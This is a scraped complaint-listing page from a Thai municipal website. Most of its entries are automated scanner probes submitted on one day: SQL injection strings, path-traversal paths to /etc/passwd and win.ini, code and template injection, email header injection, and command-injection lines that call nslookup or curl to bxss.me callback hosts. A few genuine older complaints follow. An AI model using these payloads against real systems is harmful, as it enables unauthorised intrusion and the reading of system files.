ประวัติเทศบาล ตราสัญลักษณ์ ภารกิจ โครงสร้างองค์กร ติดต่อ
 
หน้าแรก
ข้อมูลเทศบาล
ข่าวประชาสัมพันธ์
กิจกรรม
กิจกรรมสภาเทศบาล
เทศบัญญัติงบประมาณรายจ่าย
แผนพัฒนาสามปี
คู่มือประชาชน
ผลิตภัณฑ์ชุมชน
กิจการกองทุนหลักประกันสุขภาพ
ศูนย์ข้อมูลท่องเที่ยว
ประกาศจากเทศบาล
คู่มือปฏิบัติงาน
กฎหมายที่เกี่ยวข้อง
คุณธรรมและความโปร่งใส
ทรัพยากรบุคคล
สถิติ
แบบสอบถามความพึงพอใจ
ศูนย์รับเรื่องราว ร้องทุกข์
แจ้งปัญหา ค้นหา
 
 
6603180075 -1" OR 2+932-932-1=0+0+0+1 --
รอตรวจสอบ
2023-03-18
6603180074 1
รอตรวจสอบ
2023-03-18
6603180073 -1 OR 2+332-332-1=0+0+0+1
รอตรวจสอบ
2023-03-18
6603180072 -1 OR 2+733-733-1=0+0+0+1 --
รอตรวจสอบ
2023-03-18
6603180071 1
รอตรวจสอบ
2023-03-18
6603180070 1
รอตรวจสอบ
2023-03-18
6603180069 WEB-INFweb.xml
รอตรวจสอบ
2023-03-18
6603180068 WEB-INF/web.xml
รอตรวจสอบ
2023-03-18
6603180067 ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././win...
รอตรวจสอบ
2023-03-18
6603180066 ../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
รอตรวจสอบ
2023-03-18
6603180065 /.\./.\./.\./.\./.\./.\./windows/win.ini
รอตรวจสอบ
2023-03-18
6603180064 ..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
รอตรวจสอบ
2023-03-18
6603180063 ................windowswin.ini
รอตรวจสอบ
2023-03-18
6603180062 %c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0...
รอตรวจสอบ
2023-03-18
6603180061 /../../../../../../../../../../boot.ini
รอตรวจสอบ
2023-03-18
6603180060 ../../../../../../../../../../windows/win.ini%00.jpg
รอตรวจสอบ
2023-03-18
6603180059 C:WINDOWSsystem32driversetchosts
รอตรวจสอบ
2023-03-18
6603180058 /WEB-INF/web.xml
รอตรวจสอบ
2023-03-18
6603180057 19830710
รอตรวจสอบ
2023-03-18
6603180056 /../../../../../../../etc/passwd
รอตรวจสอบ
2023-03-18
6603180055 file:///etc/passwd
รอตรวจสอบ
2023-03-18
6603180054 ..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
รอตรวจสอบ
2023-03-18
6603180053 ../././../././../././../././../././../././../././../././../././../././etc/p...
รอตรวจสอบ
2023-03-18
6603180052 ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc...
รอตรวจสอบ
2023-03-18
6603180051 <!--
รอตรวจสอบ
2023-03-18
6603180050 ../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
รอตรวจสอบ
2023-03-18
6603180049 /.././.././.././.././.././.././.././../etc/./passwd%00
รอตรวจสอบ
2023-03-18
6603180048 %2fetc%2fpasswd
รอตรวจสอบ
2023-03-18
6603180047 /etc/passwd
รอตรวจสอบ
2023-03-18
6603180046 .\./.\./.\./.\./.\./.\./etc/passwd
รอตรวจสอบ
2023-03-18
6603180045 /../..//../..//../..//../..//../..//etc/passwd%00.jpg
รอตรวจสอบ
2023-03-18
6603180043 "||sleep(27*1000)*bofzqj||"
รอตรวจสอบ
2023-03-18
6603180043 ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
รอตรวจสอบ
2023-03-18
6603180042 xfs.bxss.me
รอตรวจสอบ
2023-03-18
6603180041 )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
รอตรวจสอบ
2023-03-18
6603180040 ${@print(md5(31337))}
รอตรวจสอบ
2023-03-18
6603180039 ../../../../../../../../../../etc/passwd%00.jpg
รอตรวจสอบ
2023-03-18
6603180038 "&&sleep(27*1000)*jzwrtr&&"
รอตรวจสอบ
2023-03-18
6603180037 ";print(md5(31337));$a="
รอตรวจสอบ
2023-03-18
6603180036 ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
รอตรวจสอบ
2023-03-18
6603180035 ../../../../../../../../../../../../../../../proc/version
รอตรวจสอบ
2023-03-18
6603180034 bxss.me
รอตรวจสอบ
2023-03-18
6603180033 "+"A".concat(70-3).concat(22*4).concat(101).concat(81).conca...
รอตรวจสอบ
2023-03-18
6603180032 file:///etc/passwd
รอตรวจสอบ
2023-03-18
6603180031 ../../../../../../../../../../../../../../windows/win.ini
รอตรวจสอบ
2023-03-18
6603180030
รอตรวจสอบ
2023-03-18
6603180029 c:/windows/win.ini
รอตรวจสอบ
2023-03-18
6603180028 ../../../../../../../../../../../../../../etc/passwd
รอตรวจสอบ
2023-03-18
6603180027 bxss.me/t/xss.html?%00
รอตรวจสอบ
2023-03-18
6603180026
รอตรวจสอบ
2023-03-18
6603180025 HttP://bxss.me/t/xss.html?%00
รอตรวจสอบ
2023-03-18
6603180024 /etc/shells
รอตรวจสอบ
2023-03-18
6603180023 http://bxss.me/t/fit.txt%3F.jpg
รอตรวจสอบ
2023-03-18
6603180022 ".gethostbyname(lc("hitns"."rldfdcbf00454.bxss.me."...
รอตรวจสอบ
2023-03-18
6603180021 ^(#$!@#$)(()))******
รอตรวจสอบ
2023-03-18
6603180020 Http://bxss.me/t/fit.txt
รอตรวจสอบ
2023-03-18
6603180019
รอตรวจสอบ
2023-03-18
6603180018 1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
รอตรวจสอบ
2023-03-18
6603180017 !(()&&!|*|*|
รอตรวจสอบ
2023-03-18
6603180016 http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F...
รอตรวจสอบ
2023-03-18
6603180015 )
รอตรวจสอบ
2023-03-18
6603180014 &n999627=v994428
รอตรวจสอบ
2023-03-18
6603180013 ${9999289+9999795}
รอตรวจสอบ
2023-03-18
6603180012 <esi:include src="http://bxss.me/rpb.png"/>
รอตรวจสอบ
2023-03-18
6603180011 ;(nslookup -q=cname hittmhgammngg4ae6e.bxss.me||curl hittmhgammngg4ae6e.bxs...
รอตรวจสอบ
2023-03-18
6603180010 `(nslookup -q=cname hitvnaxonnpueb7d3e.bxss.me||curl hitvnaxonnpueb7d3e.bxs...
รอตรวจสอบ
2023-03-18
6603180009 to@example.com>%0d%0abcc:009247.362-15511.362.67fb5.19434.2@bxss.me
รอตรวจสอบ
2023-03-18
6603180008 |(nslookup -q=cname hitatdjdntvlv9e090.bxss.me||curl hitatdjdntvlv9e090.bxs...
รอตรวจสอบ
2023-03-18
6603180007 %0abcc:009247.362-15510.362.67fb5.19434.2@bxss.me
รอตรวจสอบ
2023-03-18
6603180006 $(nslookup -q=cname hitfqyvpbnpij0a2c3.bxss.me||curl hitfqyvpbnpij0a2c3.bxs...
รอตรวจสอบ
2023-03-18
6603180005 (nslookup -q=cname hitofnrxhigijde3ce.bxss.me||curl hitofnrxhigijde3ce.bxss...
รอตรวจสอบ
2023-03-18
6603180004 "+response.write(9103519*9295712)+"
รอตรวจสอบ
2023-03-18
6603180003 CSIWB6xf
รอตรวจสอบ
2023-03-18
6603180002 response.write(9103519*9295712)
รอตรวจสอบ
2023-03-18
6603180001 1MEqyGmeO
รอตรวจสอบ
2023-03-18
6003090001 ช่วยจัดหางบประมาณขุดลอกลำเหมือง
ยุติแล้ว
2017-03-09
5906030003 ร้องทุกข์/ร้องเรียน(ทั่วไป)(จัดซื้อจัดจ้าง) กรณีมีพฤติกรรมในทางทุจริตต่อหน้าที่
ยุติแล้ว
2016-06-03
5906030002 ร้องทุกข์/ร้องเรียน(ทั่วไป)(จัดซื้อจัดจ้าง) กรณีทุจริตต่อหน้าที่และใช้อำนาจอย่างไม่เป็นธรรม
ยุติแล้ว
2016-06-03
5906030001 ร้องทุกข์/ร้องเรียน(ทั่วไป)กรณีไม่ได้รับการสนับสนุนงบประมาณฯ
ยุติแล้ว
2016-06-03
 
นายประพันธ์ ปันทะวงค์ : นายกเทศมนตรีเทศบาลตำบลแม่ยม
ศูนย์รับเรื่องราว ร้องทุกข์
ร้องเรียนทุจริต
ข่าวสารเกี่ยวกับเบีัยยังชีพผู้สูงอายุและคนพิการ
กระดานสนทนา
facebook เทศบาลตำบลแม่ยม
ระบบสารสนเทศการวางแผนและประเมินผลขององค์กรปกครองส่วนท้องถิ่น
ระบบการจัดซื้อจัดจ้างภาครัฐ
ระบบบันทึกบัญชีขององค์กรปกครองส่วนท้องถิ่น
จังหวัดพะเยา
เว็บไซต์กลางบริการอิเล็กทรอนิกส์ภาครัฐ
กรมส่งเสริมการปกครองส่วนท้องถิ่น
ฐานข้อมูลของหน่วยงานภาครัฐ
สำนักงานกองทุนสนับสนุนการสร้างเสริมสุขภาพ(สสส.)
สายด่วนรัฐบาล 1111
สำนักงาน ป.ป.ท.
ข่าวงานราชการ
หนังสือราชการ สถ.
852,494   
KC inventive co.,ltd. © 2016